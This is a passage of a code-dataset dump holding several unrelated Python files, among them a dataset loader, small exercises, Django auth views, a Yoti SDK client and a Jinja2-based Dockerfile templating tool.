DataStream\n\nfrom datasets.partial_transformer import PartialTransformer\nfrom datasets.augmentations import *\n\n\nclass BaselineDataset(BaseDataset):\n \"\"\"Create FUEL datastreams\"\"\"\n\n def _init_with_kwargs(self, output_dir: str, split_path, data_root, batch_size: int = 2, **kwargs):\n \"\"\"\n Initialize dataset\n :param output_dir: current log directory\n :param augmentations: augmentations settings\n :param data_paths: dictionary of paths to all different data files\n :param batch_size: batch size\n :param generated_data_size: how many images to generate to training set\n \"\"\"\n logging.info('Creating dataset')\n self._data_root = data_root\n self._batch_size = batch_size\n self._split = split_path\n\n split_df = pd.read_csv(self._split, index_col=0)\n\n # save split to log\n if output_dir:\n split_save_path = os.path.join(output_dir, 'split.csv')\n split_df.to_csv(split_save_path)\n logging.info('Split written to `%s`', split_save_path)\n\n self._data = {}\n\n for stream_label in ['train', 'valid']:\n logging.info('\\t%s:', stream_label)\n ids = odds = hours = bookmakers = teams = results = my_odds = []\n\n logging.debug('Reading labels')\n data_filenames = list(split_df[split_df['set'] == stream_label]['filename'])\n\n for filename in data_filenames:\n data_df = pd.read_csv(os.path.join(self._data_root, filename))\n\n # parse dataframe\n teams_match = filename.split('_')[:2]\n result_match = filename.split('_')[2].split('.')[0]\n hours_match = np.array(data_df['hours_to_go'])\n odds_match = np.array(data_df['1', 'x', '2'])\n bookmakers_match = data_df['bookmaker']\n my_odds_match = [1.5, 1.5, 1.5]\n\n ids.append(filename)\n odds.append(odds_match)\n hours.append(hours_match)\n bookmakers.append(bookmakers_match)\n teams.append(teams_match)\n results.append(result_match)\n my_odds.append(my_odds_match)\n\n\n logging.info('----- Loaded {} {} data'.format(len(ids), stream_label))\n\n self._data[stream_label] = IndexableDataset(OrderedDict([('odds', odds),\n ('hours', hours),\n ('bookmakers', bookmakers),\n ('teams', teams),\n ('results', teams),\n ('teams', teams),\n ('ids', ids)]))\n\n def create_train_stream(self):\n iter_scheme = ShuffledScheme(self._data['train'].num_examples, self._batch_size)\n stream = DataStream(self._data['train'], iteration_scheme=iter_scheme)\n stream = MergeSparse(stream, in_names=['labels_indices', 'labels_values'])\n\n # augmentations\n for aug in self._augmentations:\n info = self._augmentations[aug]\n if np.random.rand() > 1 - info['probability']:\n stream = globals()[aug](stream, in_names=info['input'], parameters=info['parameters'])\n\n stream = CutAndPadImage(stream, in_names=['images'], max_cuts=self._max_cuts)\n return stream.get_epoch_iterator(as_dict=True)\n\n def create_valid_stream(self):\n iter_scheme = SequentialScheme(self._data['valid'].num_examples, self._batch_size)\n stream = DataStream(self._data['valid'], iteration_scheme=iter_scheme)\n stream = MergeSparse(stream, in_names=['labels_indices', 'labels_values'])\n stream = CutAndPadImage(stream, in_names=['images'], max_cuts=self._max_cuts)\n return stream.get_epoch_iterator(as_dict=True)\n\n def create_test_stream(self):\n iter_scheme = SequentialScheme(self._data['test'].num_examples, self._batch_size)\n stream = DataStream(self._data['test'], iteration_scheme=iter_scheme)\n stream = MergeSparse(stream, in_names=['labels_indices', 'labels_values'])\n stream = CutAndPadImage(stream, in_names=['images'], max_cuts=self._max_cuts)\n return stream.get_epoch_iterator(as_dict=True)\n\n def split(self, num_splits: int, train: float, valid: float, test: float):\n filenames = [filename for filename in os.listdir(self._data_root) if '.csv' not in filename]\n random.shuffle(filenames)\n\n sum_ratio = train + valid + test\n test_count = len(filenames) // sum_ratio * test\n valid_count = len(filenames) // sum_ratio * valid\n train_count = len(filenames) - test_count - valid_count\n\n train_set = filenames[:train_count]\n valid_set = filenames[train_count:train_count + valid_count]\n test_set = filenames[train_count + valid_count:]\n\n split = pd.DataFrame(columns=['filename', 'set'])\n for label, part in zip(['train', 'valid', 'test'], [train_set, valid_set, test_set]):\n for example in part:\n split = split.append(pd.Series({'filename': example, 'set': label}), ignore_index=True)\n split.to_csv(self._split, encoding='utf-8')\n logging.info('Dataset split dumped to `%s`', self._split)\n\n\nclass MergeSparse(PartialTransformer):\n \"\"\"Transformer merges batch of n-1 dimensional indeces (and values) to n-dims\n Example: input: ([0, 1, 2, 0, 1], [1, 2, 3, 4, 5])\n output: ([[0, 0], [0, 1], [0, 2], [1, 0], [1, 1]], [1, 2, 3, 4, 5])\n \"\"\"\n def _transformation(self, data):\n indices, values = data\n final_indices = []\n final_values = []\n for i, (row_indices, row_values) in enumerate(zip(indices, values)):\n final_indices += [[i, j] for j in row_indices]\n final_values += list(row_values)\n return np.array(final_indices), np.array(final_values)\n\n\nclass CutAndPadImage(PartialTransformer):\n \"\"\"Takes a batch of images shaped [B x H x W x C]\n and returns batch of arrays of cuts (slices): B x Slices x H x CutW x C\"\"\"\n def _transformation(self, data):\n images, = data\n padded_images = []\n for image in images:\n img_width = np.shape(image)[1]\n cuts = []\n # cut one image to list of cuts\n for i in range(0, img_width - consts.CUT_WIDTH, consts.CUT_STRIDE):\n cuts.append(image[:, i:i + consts.CUT_WIDTH, :])\n # take the list, pad it and append np.array to list padded_images\n padded_images.append(np.pad(np.array(cuts),\n [(0, self.max_cuts - len(cuts)), (0, 0), (0, 0), (0, 0)],\n mode='constant'))\n return np.array(padded_images),","sub_path":"datasets/baseline_dataset.py","file_name":"baseline_dataset.py","file_ext":"py","file_size_in_byte":7339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"172530509","text":"import pandas as pd\nimport os, glob\nimport numpy as np\nimport sys\nimport shutil\n\ntrain_dir = \"D:/data/fashion/image_retrieval/mvc/images/images_resize\"\ntest_dir = \"D:/data/fashion/image_retrieval/mvc/images/images_resize_test\"\ntrain_output = os.path.join(os.path.dirname(train_dir), \"train\")\ntest_output = os.path.join(os.path.dirname(test_dir), \"test\")\ndf = pd.read_json(\"d:/data/fashion/image_retrieval/mvc/mvc_info.json\")\n\nif not os.path.isdir(train_output):\n os.makedirs(train_output)\nif not os.path.isdir(test_output):\n os.makedirs(test_output)\ntot = len(df)\nfor i, row in enumerate(df.iterrows()):\n print(i, tot)\n product_id = str(row[1].productId)\n file_name = os.path.basename(row[1].image_url_4x)\n train_path = os.path.join(train_dir, file_name)\n test_path = os.path.join(test_dir, file_name)\n from_path = None\n if os.path.isfile(train_path):\n output_dir = os.path.join(train_output, product_id)\n from_path = train_path\n else:\n output_dir = os.path.join(test_output, product_id)\n from_path = test_path\n if not os.path.isdir(output_dir):\n os.makedirs(output_dir)\n shutil.copy(from_path, output_dir)\n","sub_path":"dataset/script/mvc_split_items.py","file_name":"mvc_split_items.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"525313271","text":"class Solution:\n def isValid(self, s: str) -> bool:\n opening = ['(','[','{']\n closing = [')',']','}']\n stack = [];balanced = False\n for element in s:\n if element in opening:\n stack.append(element)\n else:\n if len(stack) == 0:\n return False\n elif element in closing:\n top = stack.pop()\n if not self.matches(top,element):\n return False\n else:\n balanced = True\n return balanced and len(stack) == 0\n\n\n def matches(self,opening,closing):\n return (opening=='(' and closing == ')') or (opening == '[' and closing == ']') or (opening == '{' and closing == '}')\n\nif __name__ == '__main__':\n balanced = Solution()\n s = \"()[((({})))]({}\"\n print(balanced.isValid(s))\n","sub_path":"Algorithms/HundredDaysOfCode/EasyProblems.py","file_name":"EasyProblems.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"462557546","text":"import cv2\nimport numpy as np\n\nimg = cv2.imread(\"./img/messi.jpg\")\nimg_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n# Define filter\nf = np.float32([[-1, 0, 1], [-2, 0, 2], [-1, 0, 1]])\n\n# Filter\ndst = cv2.filter2D(img_gray, -1, f)\ndst_gauss = cv2.GaussianBlur(img, (3,3), 0)\ndst_average = cv2.blur(img, (3,3))\n\ncv2.imshow(\"Original\", img)\ncv2.imshow(\"Transformed\", dst)\ncv2.imshow(\"Gauss\", dst_gauss),\ncv2.imshow(\"Avg\", dst_average)\ncv2.waitKey(0)","sub_path":"filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"209958657","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport json\nimport time\nimport uuid\nfrom os import environ\nfrom os.path import isfile, expanduser\n\nimport requests\nfrom past.builtins import basestring\n\nimport yoti_python_sdk\nfrom config import SDK_IDENTIFIER\nfrom yoti_python_sdk.activity_details import ActivityDetails\nfrom yoti_python_sdk.crypto import Crypto\nfrom yoti_python_sdk.protobuf.v1 import protobuf\n\nNO_KEY_FILE_SPECIFIED_ERROR = 'Please specify the correct private key file ' \\\n 'in Client(pem_file_path=...)\\nor by setting ' \\\n 'the \"YOTI_KEY_FILE_PATH\" environment variable'\n\n\nclass Client(object):\n def __init__(self, sdk_id=None, pem_file_path=None):\n self.sdk_id = sdk_id or environ.get('YOTI_CLIENT_SDK_ID')\n pem_file_path_env = environ.get('YOTI_KEY_FILE_PATH')\n\n if pem_file_path is not None:\n error_source = 'argument specified in Client()'\n pem = self.__read_pem_file(pem_file_path, error_source)\n elif pem_file_path_env is not None:\n error_source = 'specified by the YOTI_KEY_FILE_PATH env variable'\n pem = self.__read_pem_file(pem_file_path_env, error_source)\n else:\n raise RuntimeError(NO_KEY_FILE_SPECIFIED_ERROR)\n\n self.__crypto = Crypto(pem)\n\n @staticmethod\n def __read_pem_file(key_file_path, error_source):\n try:\n key_file_path = expanduser(key_file_path)\n\n if not isinstance(key_file_path, basestring) or not isfile(key_file_path):\n raise IOError('File not found: {0}'.format(key_file_path))\n with open(key_file_path, 'rb') as pem_file:\n return pem_file.read().strip()\n except (AttributeError, IOError, TypeError, OSError) as exc:\n error = 'Could not read private key file: \"{0}\", passed as: {1} '.format(key_file_path, error_source)\n exception = '{0}: {1}'.format(type(exc).__name__, exc)\n raise RuntimeError('{0}: {1}'.format(error, exception))\n\n def get_activity_details(self, encrypted_request_token):\n response = self.__make_request(encrypted_request_token)\n receipt = json.loads(response.text).get('receipt')\n\n encrypted_data = protobuf.Protobuf().current_user(receipt)\n\n if not encrypted_data:\n return ActivityDetails(receipt)\n\n unwrapped_key = self.__crypto.decrypt_token(receipt['wrapped_receipt_key'])\n decrypted_data = self.__crypto.decipher(\n unwrapped_key,\n encrypted_data.iv,\n encrypted_data.cipher_text\n )\n attribute_list = protobuf.Protobuf().attribute_list(decrypted_data)\n return ActivityDetails(receipt, attribute_list)\n\n def __make_request(self, encrypted_request_token):\n path = self.__get_request_path(encrypted_request_token)\n url = yoti_python_sdk.YOTI_API_ENDPOINT + path\n headers = self.__get_request_headers(path)\n response = requests.get(url=url, headers=headers)\n\n if not response.status_code == 200:\n raise RuntimeError('Unsuccessful Yoti API call: {0}'.format(response.text))\n\n return response\n\n def __get_request_path(self, encrypted_request_token):\n token = self.__crypto.decrypt_token(encrypted_request_token).decode('utf-8')\n nonce = uuid.uuid4()\n timestamp = int(time.time() * 1000)\n\n return '/profile/{0}?nonce={1}×tamp={2}&appId={3}'.format(\n token, nonce, timestamp, self.sdk_id\n )\n\n def __get_request_headers(self, path):\n return {\n 'X-Yoti-Auth-Key': self.__crypto.get_public_key(),\n 'X-Yoti-Auth-Digest': self.__crypto.sign('GET&' + path),\n 'X-Yoti-SDK': SDK_IDENTIFIER,\n 'Content-Type': 'application/json',\n 'Accept': 'application/json'\n }\n","sub_path":"yoti_python_sdk/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"286760520","text":"# function definition \ndef fib_int(n):\n a,b,=0,1\n while a min_gx:\n\t\t\t\t\t\tmin_idx = x\n\t\t\t\t\t\tmin_gx = gx(w[x], w0[x], [data], W)\n\t\t\t\telse:\n\t\t\t\t\tif gx(w[x], w0[x], [data], W[x]) > min_gx:\n\t\t\t\t\t\tmin_idx = x\n\t\t\t\t\t\tmin_gx = gx(w[x], w0[x], [data], W[x])\n\n\t\t\tconfusion[classCount][min_idx] += 1\n\t\tclassCount += 1\n\n\tprint(confusion)\n\tprecision = []\n\trecall = []\n\tfmeasure = []\n\n\tfor i in range(len(test_data)):\n\t\tright += confusion[i][i]\n\t\tprecision.append(confusion[i][i]/sum(confusion[i]))\n\t\trecall.append(confusion[i][i]/(sum(x[i] for x in confusion)))\n\n\tfor i in range(len(test_data)):\n\t\tfmeasure.append(2*precision[i]*recall[i]/(precision[i] + recall[i]))\n\n\taccuracy = right / total\n\n\treturn confusion, accuracy, precision, recall, fmeasure\n\t","sub_path":"accuracy.py","file_name":"accuracy.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"417211444","text":"import numpy as np\nimport pandas as pd\n\nimport sklearn\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.model_selection import train_test_split\n\nimport imageio\n\n\n# Used these values to edit the .csv files to convert the data to be between 0-255 for each column\n# def div_by_256(n):\n# return int(n/256)\n# # Max Bin divisor\n# # branch-misses \t591493 2320\n# # branch-loads \t82718597 324387\n# # L1-dcache-loads \t37533491 147191\n# # L1-dcache-stores \t21723268 85190\n# max_val_4 = [591493, 82718597, 37533491, 21723268]\n# bin_count_4 = map(div_by_256, max_val_4)\n#\n# # Max Bin divisor\n# # bus-cycles 1957393 7677\n# # branch-instructions \t35057193 137480\n# # branch-misses \t591493 2320\n# # instructions \t116254971 455902\n# # branch-loads \t82718597 324387\n# # L1-dcache-loads \t37533491 147191\n# # L1-dcache-stores \t21723268 85190\n# # iTLB-load-misses \t34729 137\n# max_val_8 = [1957393, 35057193, 591493, 116254971, 82718597, 37533491, 21723268, 34729]\n# bin_count_8 = map(div_by_256, max_val_8)\n\n\n\n# Pick the file to use\n# Open the file and read in the data\nfile_name = 'GrayScale-4'\n# file_name = 'GrayScale-8'\nfile_path = '../GrayScaleDataset/' + file_name + '.csv'\n\nbase_folder = \"../grayscale-images-4\"\n# base_folder = \"../grayscale-images-8\"\n\n\nraw_data = pd.read_csv(file_path)\nprint(raw_data)\n\n# transformed_data = raw_data\n# transformed_data['class'] = transformed_data['class'].map({'backdoor': True, 'rootkit':True,'trojan':True,'virus':True,'worm':True, 'benign': False})\n\n# print(transformed_data)\n# # transformed_data.pop('class')\n# dataset_size= transformed_data.values.__len__()\n# print(\"dataset_size \", dataset_size)\n# image_arrays = []\n# print(\"image_arrays \", image_arrays)\n# print(\"image_arrays.len \", image_arrays.__len__())\n\n\n# Use a utility from sklearn to split and shuffle our dataset.\ntrain_df, test_df = train_test_split(raw_data, test_size=0.2)\ntrain_df, val_df = train_test_split(train_df, test_size=0.2)\n\n\ncount = {\"backdoor\":0,\"benign\":0,\"rootkit\":0,\"trojan\":0,\"virus\":0,\"worm\":0}\n\ndataset = [train_df, test_df, val_df]\ndataset_name = [\"train\", \"test\", \"val\"]\n\nfor i in range(3):\n folder = dataset_name[i]\n for row in dataset[i].values:\n row_values = row[0:-1]\n\n # 16 x 16 input size\n # A attributes: A*n x A*n where n=number of duplicate values\n # 8 attributes: 8*2 x 8*2\n # 4 attributes: 4*4 x 4*4\n\n # 4 attributes\n # print(\"row \", row_values)\n half_row = np.append(row_values, row_values)\n full_row = np.append(half_row, half_row)\n # print(\"full \", full_row)\n\n # 8 attributes\n # print(\"row \", row_values)\n # full_row = np.append(row_values, row_values)\n # print(\"full \", full_row)\n\n a = np.empty((0, 16))\n for i in range(16):\n a = np.append(a, [full_row], axis=0)\n\n a = np.uint8(a)\n # f = open(\"temp\",'rw')\n file_name = base_folder+\"/\"+folder + \"/\" + row[-1] + '-' + str(count[row[-1]]) + '.png'\n count[row[-1]] += 1\n imageio.imwrite(file_name, a)\n\n # image_arrays.append(g)\n\n\n\n\n# grayscale_data = transformed_data['class']\n# grayscale_data = pd.DataFrame(grayscale_data)\n#\n\n\n\n\n","sub_path":"Python/preprocessing/grayscale-tranform-preprocessing.py","file_name":"grayscale-tranform-preprocessing.py","file_ext":"py","file_size_in_byte":3454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"503541632","text":"#Rock Paper scissors\n\nprint(\"importing pre-requisites...\")\n#Grab random so we can use choice\nimport random as rand\n\n#Patch notes:\n#Ver 1.0:\n#-Game created\n#Ver 2.0:\n#-Draw conditions added.\n#Ver 3.0:\n# Options for Human v Computer play installed\n#ver 4.0:\n# Enabled repeat play.\n#ver 5.0:\n# allowed for cheat detection. no more crashes by entering a null value!\n\nprint(\"creating environment variables\")\n#valid choices\nvalid = (\"rock\", \"paper\", \"scissors\")\n\n#set up while variable\nrepeat = 0\n\n#options for how the computer will play\n# Leaving as list no tuple for now for future expansion\n# '''[Computer enabled, Play Mode]'''\ncompOptions = [False, 1]\n#Modes:\n# 0: Pick a choice at random\n# 1: Pick a choice at random, weighted to tie\n\nprint(\"Rock-Paper-Scissors module installed! PLease enjoy\")\n\n#start while loop\nwhile repeat == 0:\n if compOptions[0] == False:\n print(\"Player One please pick your option\")\n player1 = input().lower()\n print(\"Player Two please pick your option\")\n player2 = input().lower()\n else:\n print(\"Human Player, please make your choice\")\n player1 = input().lower()\n\n # print(valid.index(player1))\n\n #Generate weights for compPlay\n if compOptions[0] == True and compOptions[1] != 0:\n weight = [1, 1, 1]\n weight[(valid.index(player1))] =+ 3\n\n #Computer makes choice\n if compOptions[1] == 0:\n player2 = rand.choice(valid)\n if compOptions[1] == 1:\n player2 = rand.choices(valid, weights= weight, k=1)[0]\n # if compOptions[1] == 2:\n # player2 = rand.choices(valid, weights= weight, k=1)\n \n\n #compare results\n\n #player one wins\n #paper beats rock beats scisors beats paper\n if player1 == \"paper\" and player2 == \"rock\" or player1 == \"rock\" and player2 == \"scissors\" or player1 == \"scissors\" and player2 == \"paper\":\n winner = \"One\"\n #player two wins\n if player2 == \"paper\" and player1 == \"rock\" or player2 == \"rock\" and player1 == \"scissors\" or player2 == \"scissors\" and player1 == \"paper\":\n winner = \"Two\"\n\n #Tie\n if player1 == player2:\n winner = \"Tie\"\n\n #cheat!\n if player1 not in valid or player2 not in valid:\n winner = \"No Win\"\n\n winCondition = {\"One\":\"Player One Wins!\", \"Two\":\"Player Two Wins!\", \"Tie\":\"Tie! No winners, but no losers!\", \"No Win\":\"Hey, One of you cheated! No winning for either of you!\"}\n\n #Commented out to fix the draw condition.\n # print(f\"the winner is Player {winner}\")\n\n print(winCondition[winner])\n print(\"Would you like another game?(y/n)\")\n if input().lower() == \"n\":\n repeat = 1\nprint(\"Thanks for playing! :)\")\nprint(\"We hope to see you again!\")","sub_path":"RockPaperScissorsV5.py","file_name":"RockPaperScissorsV5.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"49099327","text":"#!/usr/bin/python\n# Classification (U)\n\n\"\"\"Program: db_db_cmd.py\n\n Description: Unit testing of DB.db_cmd in mongo_class.py.\n\n Usage:\n test/unit/mongo_class/db_db_cmd.py\n\n Arguments:\n\n\"\"\"\n\n# Libraries and Global Variables\n\n# Standard\nimport sys\nimport os\n\nif sys.version_info < (2, 7):\n import unittest2 as unittest\nelse:\n import unittest\n\n# Third-party\n\n# Local\nsys.path.append(os.getcwd())\nimport mongo_class\nimport version\n\n__version__ = version.__version__\n\n\nclass DBValidate(object):\n\n \"\"\"Class: DBValidate\n\n Description: Class stub holder for DB class.\n\n Methods:\n __init__\n command\n\n \"\"\"\n\n def __init__(self):\n\n \"\"\"Function: __init__\n\n Description: Class intialization.\n\n Arguments:\n\n \"\"\"\n\n self.cmd = None\n self.obj = None\n\n def command(self, cmd, obj=None):\n\n \"\"\"Function: command\n\n Description: Stub for DB.db.command method.\n\n Arguments:\n (input) cmd\n (input) obj\n (output) Returns the output of the database command.\n\n \"\"\"\n\n self.cmd = cmd\n self.obj = obj\n\n return True\n\n\nclass UnitTest(unittest.TestCase):\n\n \"\"\"Class: UnitTest\n\n Description: Class which is a representation of a unit testing.\n\n Methods:\n setUp\n test_default\n test_object\n\n \"\"\"\n\n def setUp(self):\n\n \"\"\"Function: setUp\n\n Description: Initialization for unit testing.\n\n Arguments:\n\n \"\"\"\n\n self.name = \"Mongo_Server\"\n self.user = \"mongo_user\"\n self.japd = \"mongo_pd\"\n self.host = \"host_server\"\n self.port = 27017\n self.dbs = \"test\"\n self.db_auth = None\n\n def test_default(self):\n\n \"\"\"Function: test_default\n\n Description: Test db_cmd method with default arguments.\n\n Arguments:\n\n \"\"\"\n\n mongo = mongo_class.DB(self.name, self.user, self.japd,\n self.host, self.port)\n mongo.db = DBValidate()\n\n self.assertTrue(mongo.db_cmd(\"command\"))\n\n def test_object(self):\n\n \"\"\"Function: test_object\n\n Description: Test with object passed to method.\n\n Arguments:\n\n \"\"\"\n\n mongo = mongo_class.DB(self.name, self.user, self.japd,\n self.host, self.port)\n mongo.db = DBValidate()\n\n self.assertTrue(mongo.db_cmd(\"command\", obj=\"object_name\"))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"test/unit/mongo_class/db_db_cmd.py","file_name":"db_db_cmd.py","file_ext":"py","file_size_in_byte":2518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"383257335","text":"from django import forms\nfrom django.contrib.auth.views import LoginView as DefaultLoginView\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.http import Http404\nfrom django.shortcuts import redirect, reverse, render, get_object_or_404\nfrom django.views.generic import View, UpdateView, DetailView\nfrom .forms_auth import UpdateProfileForm, SignUpForm\n\n\nfrom .forms_auth import LoginForm\nfrom advito.models import Profile\n\n\nclass LoginView(DefaultLoginView):\n template_name = \"my_auth/login.html\"\n form = LoginForm\n\n def post(self, request, *args, **kwargs):\n form = self.form_class(data=request.POST)\n if form.is_valid():\n username = form.cleaned_data.get('username')\n password = form.cleaned_data.get('password')\n user = authenticate(username=username, password=password)\n if user:\n login(request, user)\n return redirect(reverse('advito:announcement'), request)\n else:\n return render(request, self.template_name, {'form': form})\n else:\n return render(request, self.template_name, {'form': form})\n\n\ndef logout_view(request):\n logout(request)\n return redirect(reverse('advito:login'))\n\nclass ProfileView(DetailView):\n model = Profile\n template_name = 'my_auth/profile.html'\n\n def get_object(self):\n return get_object_or_404(self.model, user_id=self.kwargs['user_id'])\n\nclass EditProfileView(UpdateView):\n model = Profile\n form_class = UpdateProfileForm\n template_name = \"my_auth/edit_profile.html\"\n slug_field = \"user_id\"\n slug_url_kwarg = \"user_id\"\n\n def get_success_url(self):\n user_id = self.kwargs.get(\"user_id\")\n return reverse(\"advito:profile\", args=(self.request.user.id, ))\n\n def dispatch(self, request, *args, **kwargs):\n obj = self.get_object()\n if obj.user != request.user:\n raise Http404('go away')\n return super(EditProfileView, self).dispatch(request, *args, **kwargs)\n\nclass SignUpView(View):\n template_name = \"my_auth/siginup.html\"\n signup_form = SignUpForm\n\n def get(self, request, *args, **kwargs):\n return render(request, self.template_name, {'form': self.signup_form})\n\n def post(self, request, *args, **kwargs):\n user_form = self.signup_form(data=request.POST)\n\n registered = False\n context = {}\n if user_form.is_valid():\n user_form.save()\n context.update({'registered': True})\n registered = True\n else:\n context.update({'form': user_form})\n\n return render(request, self.template_name, context)\n\n","sub_path":"advito/views_auth.py","file_name":"views_auth.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"415355940","text":"\"\"\"\ndodo - Parameterized docker builds\n----\n\nUse the power of the jinja2 template language to create parameterized\nand configurable docker files. Could also be used for any other kind\nof (line-based) config file, hopefully.\n\nDodo itself does not build containers, but you can pipe it's result directly\nto docker build (all logging goes to stderr):\n\n dodo testconfig.py Dockerfile.tpl | docker build -t dermitch/test\n\nWays to set config keys:\n- The config file itself (defaults)\n- Environment variables (KEY=value dodo testconfig.py Dockerfile)\n- Arguments (dodo testconfig.py Dockerfile KEY=value ...)\n\nAdditional configuration features:\n- Require items to be in a list\n- Use a dictionary mapping\n- Use any callable\nSee testconfig.py for examples.\n\nIn your template, use the line syntax of Jinja2 for better readability:\n\n## if WITH_MYSQL:\nRUN apt-get install -y mysql-server\n## endif\n\n:author: Michael Mayr \n:license: MIT license\n:version: 1.0\n\"\"\"\n\nfrom __future__ import print_function\n\nimport os\nimport sys\nimport imp\nimport logging\nfrom argparse import ArgumentParser\n\nfrom jinja2 import Environment, DictLoader\n\nlog = logging.getLogger(\"dodo\")\n\n\n#\n# Configuration\n#\ndef str_to_bool(value, default=None):\n \"\"\"\n Convert a string to a boolean. Supported values:\n\n True: yes, 1, true\n False: no, 0, false\n\n If the value can't be determined, default will be returned.\n \"\"\"\n if isinstance(value, bool):\n return value\n if value.lower() in (\"yes\", \"1\", \"true\"):\n return True\n if value.lower() in (\"no\", \"0\", \"false\"):\n return False\n return default\n\n\ndef str_to_number(value, default=None):\n \"\"\"Convert a string to a number or return a default value if it fails\"\"\"\n try:\n return int(value)\n except ValueError:\n return default\n\n\ndef dict_mapper(mapping, key):\n \"\"\"Return a dict's key or throw a error. We assume that failed lookups\n are errors which shouldn't return the default.\"\"\"\n try:\n return mapping[key]\n except IndexError:\n raise Exception(\"Invalid key {} for mapping\".format(key))\n\n\ndef get_config(configfile, osenviron, args_list):\n \"\"\"\n Determine build configuration using:\n - A python config file for defaults and special mappings\n - Enviroment variables\n - Command line arguments\n\n Values will only be overriden if they validate. Enable verbose logging\n if your values are not applied to see the reason.\n \"\"\"\n # Mapping of VARIABLE -> converter function\n type_mapping = {}\n # Template values\n values = {}\n\n log.debug(\"Loading file {}\".format(configfile))\n config = imp.load_source('dodo_config', configfile)\n\n log.debug(\"Processing configuration from file\")\n for name in dir(config):\n if name.upper() != name or name.startswith('_'):\n continue\n\n value = getattr(config, name)\n\n if hasattr(config, \"_\" + name):\n # Variable mappings\n mapper = getattr(config, \"_\" + name)\n if isinstance(mapper, (tuple, list, set)):\n log.debug(\" -> {} looks like a list\".format(name))\n type_mapping[name] = lambda x, m=mapper: x if x in m else None\n elif isinstance(mapper, dict):\n log.debug(\" -> {} looks like a dict\".format(name))\n type_mapping[name] = lambda x, m=mapper: dict_mapper(m, x)\n elif callable(mapper):\n log.debug(\" -> {} looks like a callable\".format(name))\n type_mapping[name] = mapper\n else:\n # Static mappings\n if isinstance(value, bool):\n log.debug(\" -> {} looks like a boolean\".format(name))\n type_mapping[name] = str_to_bool\n elif isinstance(value, (str, unicode)):\n log.debug(\" -> {} looks like a string\".format(name))\n type_mapping[name] = unicode\n elif isinstance(value, (int, long)):\n log.debug(\" -> {} looks like a integer\".format(name))\n type_mapping[name] = str_to_number\n\n if name in type_mapping:\n values[name] = type_mapping[name](value)\n\n # Find any matching enviroment variable and try to parse it\n for key in values:\n if key in osenviron:\n newval = type_mapping[key](os.environ[key])\n if newval is not None:\n log.debug(\" -> {} overriden by environment\".format(key))\n values[key] = newval\n else:\n # warning\n log.warning(\"Could not parse value of env {}\".format(key))\n\n # args_list = ['key=\"value\"', 'key=1', ...]\n for arg in args_list:\n key, value = arg.split(\"=\", 1)\n if value.startswith('\"'):\n value = value[1:-1]\n\n if key not in type_mapping:\n log.warning(\"Key {} hasn't been defined in \"\n \"the config file\".format(key))\n continue\n\n newval = type_mapping[key](value)\n if newval is not None:\n log.debug(\" -> {} overriden by argument\".format(key))\n values[key] = newval\n else:\n log.warning(\"Could not parse value of argument {}\".format(key))\n\n return values\n\n\ndef finalize(value):\n \"\"\"Finalizer for Jinja2 which returns an empty string on None's\"\"\"\n if value is None:\n return ''\n return value\n\n\ndef main():\n \"\"\"Main method for dodo, parse arguments and the template\"\"\"\n #\n # Arguments\n #\n parser = ArgumentParser()\n parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\",\n help=\"Enable verbose logging\")\n parser.add_argument(\"configfile\", help=\"Python configuration file\")\n parser.add_argument(\"template\", help=\"Template file\")\n parser.add_argument(\"config\", nargs=\"*\",\n help=\"Overridden config values (KEY=value)\")\n\n args = parser.parse_args()\n\n if args.verbose:\n logging.basicConfig(level=logging.DEBUG, stream=sys.stderr)\n else:\n logging.basicConfig(level=logging.WARNING, stream=sys.stderr)\n\n values = get_config(args.configfile, os.environ, args.config)\n\n log.debug(\"------ Config --------\")\n for key, value in values.iteritems():\n log.debug(\"{}={!r}\".format(key, value))\n log.debug(\"------ /Config --------\")\n\n #\n # Template renderer\n #\n templates = {}\n env = Environment(\n line_statement_prefix='##',\n keep_trailing_newline=True,\n finalize=finalize,\n autoescape=False,\n loader=DictLoader(templates)\n )\n\n log.debug(\"Loading template\")\n with open(args.template) as f:\n templates['template'] = f.read().decode(\"UTF-8\")\n\n log.debug(\"Rendering template\")\n tpl = env.get_template(\"template\")\n result = tpl.render(**values)\n\n log.debug(\"-----------------------------------------\")\n print(result)\n log.debug(\"-----------------------------------------\")\n\nif __name__ == '__main__':\n main()\n","sub_path":"dodo.py","file_name":"dodo.py","file_ext":"py","file_size_in_byte":6989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"141013701","text":"\"\"\"\nViews\n\n\"\"\"\nimport logging\n\nfrom rest_framework import generics\nfrom rest_framework.renderers import TemplateHTMLRenderer\n\nfrom api import views as apiviews\nfrom . import serializers\n\nLOG = logging.getLogger(__name__)\n\n\nclass ResourcePageMixin(apiviews.ViewMixinBase):\n \"\"\"\n Mixin class for views which ensured the returned object is decorated with the current user's\n profile as required by :py:class:`ui.serializers.ResourcePageSerializer`.\n\n \"\"\"\n renderer_classes = 